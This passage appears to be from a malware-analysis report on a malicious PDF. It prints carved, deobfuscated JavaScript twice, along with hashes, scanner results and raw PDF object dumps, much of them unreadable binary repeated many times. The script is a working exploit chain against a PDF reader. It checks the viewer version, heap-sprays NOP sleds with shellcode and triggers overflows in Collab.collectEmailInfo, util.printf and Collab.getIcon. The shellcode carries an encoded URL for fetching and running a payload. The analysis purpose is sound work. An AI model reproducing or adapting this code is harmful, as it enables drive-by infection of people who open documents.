9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+CwAwQ;gxR=HgA("\u9090\u9090");beJ=5*2;SbM=beJ+PMI.length;while(gxR.length<SbM)gxR+=gxR;jdS=gxR.substring(0,SbM);Rri=gxR.substring(0,gxR.length-SbM);while(Rri.length+SbM<0x40000)Rri=Rri+Rri+jdS;rrO=[];for(Dum=0;Dum<180;Dum++)rrO[Dum]=Rri+PMI;var ynN=4012;var gWI=Array(ynN);for(Dum=0;Dum<ynN;Dum++)
{gWI[Dum]=HgA("\u000a\u000a\u000a\u000a");}
Collab.getIcon(gWI+"_N.bundle");}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x497 | 11179 bytes |
SHA-256: d357c6534afb9070d550ce5ef4e80c0979a6942d6a79c7df3b50b3d58a6d0a9e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var HgA=unescape,dXX=app.viewerVersion.toString(),pRq=HgA("t\h\i\s");pRq=eval(pRq);if(dXX<8)
{AukLz();}
if(dXX>=8&&dXX<9)
{cam();}
if(dXX<=9)
{WgPiU();}
function SuWEp(Izvxe,Thorr){while(Izvxe.length*2<Thorr){Izvxe+=Izvxe;}
return Izvxe.substring(0,Thorr/2);}
function AukLz(){var gIdTy=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0032\u0000\u0000\u0000\x40\x30\x40\x30\x40\x30\x40\x30");var yGWCg=0x0c0c0c0c;var qEmTy=[];var uDAqF=0x400000;var GfdiU=gIdTy.length*2;var Thorr=uDAqF-(GfdiU+0x38);var Izvxe=HgA("\u9090\u9090");Izvxe=SuWEp(Izvxe,Thorr);var mtWVW=(yGWCg-0x400000)/uDAqF;for(var werhr=0;werhr<mtWVW;werhr++){qEmTy[werhr]=Izvxe+gIdTy;}
var SJtFn=HgA("\u0c0c\u0c0c");while(SJtFn.length<44952)SJtFn+=SJtFn;this.collabStore=Collab.collectEmailInfo({subj:"",msg:SJtFn});}
function cam(){var VKF=new Array();function whk(kCo,zux){while(kCo.length*2<zux){kCo+=kCo;}
kCo=kCo.substring(0,zux/2);return kCo;}
sfG=0x30303030;EpS=HgA("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0031\u0000");var SSW=0x400000;var jIj=EpS.length*2;var zux=SSW-(jIj+0x38);var kCo=HgA("\u9090\u9090");kCo=whk(kCo,zux);var ija=(sfG-0x400000)/SSW;for(var UUi=0;UUi<ija;UUi++){VKF[UUi]=kCo+EpS;}
var Tes="09547910578309540547";for(HgA=0;HgA<138*2;HgA++){Tes+="2";}
util.printf("%45000f",Tes);}
function phR(MsZ)
{MsZ=MsZ.replace(/[\+1]/g,"0");MsZ=MsZ.replace(/[\+2]/g,"9");MsZ=MsZ.replace(/[\+3]/g,"8");MsZ=MsZ.replace(/[\+4]/g,"7");MsZ=MsZ.replace(/[\+5]/g,"6");MsZ=MsZ.replace(/[\+6]/g,"5");MsZ=MsZ.replace(/[\+7]/g,"4");MsZ=MsZ.replace(/[\+8]/g,"3");MsZ=MsZ.replace(/[\+9]/g,"2");MsZ=MsZ.replace(/[\+0]/g,"1");return MsZ;}
function WgPiU(){var CwAwQ=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0033\u0000\u3734\u3734\u3734\u3734\u3734\u3734\u3734\u3734");PMI=HgA("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+CwAwQ;gxR=HgA("\u9090\u9090");beJ=5*2;SbM=beJ+PMI.length;while(gxR.length<SbM)gxR+=gxR;jdS=gxR.substring(0,SbM);Rri=gxR.substring(0,gxR.length-SbM);while(Rri.length+SbM<0x40000)Rri=Rri+Rri+jdS;rrO=[];for(Dum=0;Dum<180;Dum++)rrO[Dum]=Rri+PMI;var ynN=4012;var gWI=Array(ynN);for(Dum=0;Dum<ynN;Dum++)
{gWI[Dum]=HgA("\u000a\u000a\u000a\u000a");}
Collab.getIcon(gWI+"_N.bundle");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+991>>
stream
x^�XmO 9 ��F��� !n��v��'�n;��fo/$au :
� C` � HP��>U= � �ݷ�)AS��w������8�=�y�崙 �����?��FWW[ '�u3{�������rw1�L������ ,����t8 �;� �����. ��� '۶�q�� ���
�l�̿V�� HXBx4�x ڮ��7�}�'��� ���.��Uw��Ǜf����lֻ�>��7-k뼙� �?�핌 � ?�f�,���3~ݚ/ ��4D��\ �J���2�9~��p �Rå�: .���p)���e.�'� �e �ֻ R[@*� �J�V�5�l KV�)X . ?�:#*����y"�B g)zYh�̋ |Cc����G) ?BQV�N�7��BIDT�8y JЬ` �tJå� T� �T��%o! d%��f. e�Y)O�3E�X1"��. �� �%x ���� e[+A�����[�H� E�f�V� fm(C [� ŵ ���$Q� +BcC�\L {��/�F>� ��A�u ?^��:�Z�6� �R tҹD (*4u0�V� ��H9��C�R�����D���@���_W'H^/e�Ye��� Ti�&S� �D���� ͮ0� ���H9��U*�_ A�$��( ��= , � �j2)X 'i^IS �QF >��t`i��iWkK�(�J� �.5Q� �9
�@ ���� 4.j�� �K5� ����5z�} ���� Bg��˽0�č8j���!^� � �˲v 4r� ����x���z ,`@���y����F�6 ���.E�t�"�V� u���b��^��D�ߥ�{�A '��.) 7Og� �s�M�q�����E�>� �"��_ iz� U e E^-�|5��</ �cV���`q:�o ]��� w ���
<fVs�� ������{ 0<���ټ�� b�/kX���H��o��6���l6� l�G�������r���� ��� �� N� ��@i� ��! ^�t�7?y�% \�� ^�� $W9�� T���' � |��3 ���p;J��� �
���,�Hb=��:� �1 �ʁ��NG�Cu7�1 �b"4k���%qtfI�9BN��d� �tN�t{� Ɛ�.H*Ld���kB'8��D �0 g
љ��Dt M�}Z�� k]��DF�t%� Cx E� j��`[ B��I� ��g\[I�B u� eR��t (�g 7q<a��� C� ��m,k<lSQ�_���h��|x-4Q@ l�#+� õ&�����[} W hڂ��:�V�m�I�i���9Bui �yE�BV �Y�^� ��{��ː!� >v�7�����mA>����6V �>>��@&<��T 4#�6s�&2'�Z� ��L1 �v-�v]� �yz���i ��� ��~�.r����E�� � �j�5��
��:�.�ڊ���O�)�_K�)� ���=(�1NYI�'P�}��[Y�n T�: �i� �K�u���� �+���T` ��F � o2�� CD\�2�,R?Ͳ �t �� �P�U�� [[RG����A�# �JR��߄����� Y{�O� ��Jf�θ��Gt'�K&&B����M�� �~�����k�v�*��z� �W�|ޅ�A�%��{
��� �a��:9 U]����
�� ��� �)�6 �I� }i � �)}d��o�y� e�� �i����k���eG @�3e �4"g��W ف��br�u������K��w
���;'�Mh�5ʫ���W� �� Z�5k��GGM����� � ov��ߒJ��OH K� Ҝ�� i�R��T��xBjX�?!�,UOHK��'��� �����<�뭮 �� ���?�_�p �_��_��� � L ���O)N��v c�C��>���@��g| �o^?^q��旪@{�=|Ua���Xu��E �w�P���گ@ gǻ�\�����l�H���s�i��\���f�� ~}�!�`6�;�� 5�zy�� ��Y~��C��� � }���4���E&�e��S��Z�q�]s ����- [W�� � ��5��}�X]���b��rڅe�����u ��� ��4��'<�`�x� ��L� JJ�
N��J *�,*��� ��8 ��#�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� l
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x497 | 11200 bytes |
SHA-256: f081436f6bfe5a36acee971bcb36fdc082409659748789fbf2d249faf9b10d58 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var HgA=unescape,dXX=app.viewerVersion.toString(),pRq=HgA("t\h\i\s");pRq=eval(pRq);if(dXX<8)
{AukLz();}
if(dXX>=8&&dXX<9)
{cam();}
if(dXX<=9)
{WgPiU();}
function SuWEp(Izvxe,Thorr){while(Izvxe.length*2<Thorr){Izvxe+=Izvxe;}
return Izvxe.substring(0,Thorr/2);}
function AukLz(){var gIdTy=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0032\u0000\u0000\u0000\x40\x30\x40\x30\x40\x30\x40\x30");var yGWCg=0x0c0c0c0c;var qEmTy=[];var uDAqF=0x400000;var GfdiU=gIdTy.length*2;var Thorr=uDAqF-(GfdiU+0x38);var Izvxe=HgA("\u9090\u9090");Izvxe=SuWEp(Izvxe,Thorr);var mtWVW=(yGWCg-0x400000)/uDAqF;for(var werhr=0;werhr<mtWVW;werhr++){qEmTy[werhr]=Izvxe+gIdTy;}
var SJtFn=HgA("\u0c0c\u0c0c");while(SJtFn.length<44952)SJtFn+=SJtFn;this.collabStore=Collab.collectEmailInfo({subj:"",msg:SJtFn});}
function cam(){var VKF=new Array();function whk(kCo,zux){while(kCo.length*2<zux){kCo+=kCo;}
kCo=kCo.substring(0,zux/2);return kCo;}
sfG=0x30303030;EpS=HgA("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0031\u0000");var SSW=0x400000;var jIj=EpS.length*2;var zux=SSW-(jIj+0x38);var kCo=HgA("\u9090\u9090");kCo=whk(kCo,zux);var ija=(sfG-0x400000)/SSW;for(var UUi=0;UUi<ija;UUi++){VKF[UUi]=kCo+EpS;}
var Tes="09547910578309540547";for(HgA=0;HgA<138*2;HgA++){Tes+="2";}
util.printf("%4"+"50"+"00"+"f",Tes);}
function phR(MsZ)
{MsZ=MsZ.replace(/[\+1]/g,"0");MsZ=MsZ.replace(/[\+2]/g,"9");MsZ=MsZ.replace(/[\+3]/g,"8");MsZ=MsZ.replace(/[\+4]/g,"7");MsZ=MsZ.replace(/[\+5]/g,"6");MsZ=MsZ.replace(/[\+6]/g,"5");MsZ=MsZ.replace(/[\+7]/g,"4");MsZ=MsZ.replace(/[\+8]/g,"3");MsZ=MsZ.replace(/[\+9]/g,"2");MsZ=MsZ.replace(/[\+0]/g,"1");return MsZ;}
function WgPiU(){var CwAwQ=HgA("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u7A2F\u6F6B\u6C6F\u2E7A\u6E63\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u5D74\u265D\u3D65\u0033\u0000\u3734\u3734\u3734\u3734\u3734\u3734\u3734\u3734");PMI=HgA("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+CwAwQ;gxR=HgA("\u9090\u9090");beJ=5*2;SbM=beJ+PMI.length;while(gxR.length<SbM)gxR+=gxR;jdS=gxR.substring(0,SbM);Rri=gxR.substring(0,gxR.length-SbM);while(Rri.length+SbM<0x40000)Rri=Rri+Rri+jdS;rrO=[];for(Dum=0;Dum<180;Dum++)rrO[Dum]=Rri+PMI;var ynN=4012;var gWI=Array(ynN);for(Dum=0;Dum<ynN;Dum++)
{gWI[Dum]=HgA("\u000a\u000a\u000a\u000a");}
Collab.getIcon(gWI+"_N"+".b"+"un"+"dl"+"e");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 1000+991>>
stream
x^�XmO 9 ��F��� !n��v��'�n;��fo/$au :
� C` � HP��>U= � �ݷ�)AS��w������8�=�y�崙 �����?��FWW[ '�u3{�������rw1�L������ ,����t8 �;� �����. ��� '۶�q�� ���
�l�̿V�� HXBx4�x ڮ��7�}�'��� ���.��Uw��Ǜf����lֻ�>��7-k뼙� �?�핌 � ?�f�,���3~ݚ/ ��4D��\ �J���2�9~��p �Rå�: .���p)���e.�'� �e �ֻ R[@*� �J�V�5�l KV�)X . ?�:#*����y"�B g)zYh�̋ |Cc����G) ?BQV�N�7��BIDT�8y JЬ` �tJå� T� �T��%o! d%��f. e�Y)O�3E�X1"��. �� �%x ���� e[+A�����[�H� E�f�V� fm(C [� ŵ ���$Q� +BcC�\L {��/�F>� ��A�u ?^��:�Z�6� �R tҹD (*4u0�V� ��H9��C�R�����D���@���_W'H^/e�Ye��� Ti�&S� �D���� ͮ0� ���H9��U*�_ A�$��( ��= , � �j2)X 'i^IS �QF >��t`i��iWkK�(�J� �.5Q� �9
�@ ���� 4.j�� �K5� ����5z�} ���� Bg��˽0�č8j���!^� � �˲v 4r� ����x���z ,`@���y����F�6 ���.E�t�"�V� u���b��^��D�ߥ�{�A '��.) 7Og� �s�M�q�����E�>� �"��_ iz� U e E^-�|5��</ �cV���`q:�o ]��� w ���
<fVs�� ������{ 0<���ټ�� b�/kX���H��o��6���l6� l�G�������r���� ��� �� N� ��@i� ��! ^�t�7?y�% \�� ^�� $W9�� T���' � |��3 ���p;J��� �
���,�Hb=��:� �1 �ʁ��NG�Cu7�1 �b"4k���%qtfI�9BN��d� �tN�t{� Ɛ�.H*Ld���kB'8��D �0 g
љ��Dt M�}Z�� k]��DF�t%� Cx E� j��`[ B��I� ��g\[I�B u� eR��t (�g 7q<a��� C� ��m,k<lSQ�_���h��|x-4Q@ l�#+� õ&�����[} W hڂ��:�V�m�I�i���9Bui �yE�BV �Y�^� ��{��ː!� >v�7�����mA>����6V �>>��@&<��T 4#�6s�&2'�Z� ��L1 �v-�v]� �yz���i ��� ��~�.r����E�� � �j�5��
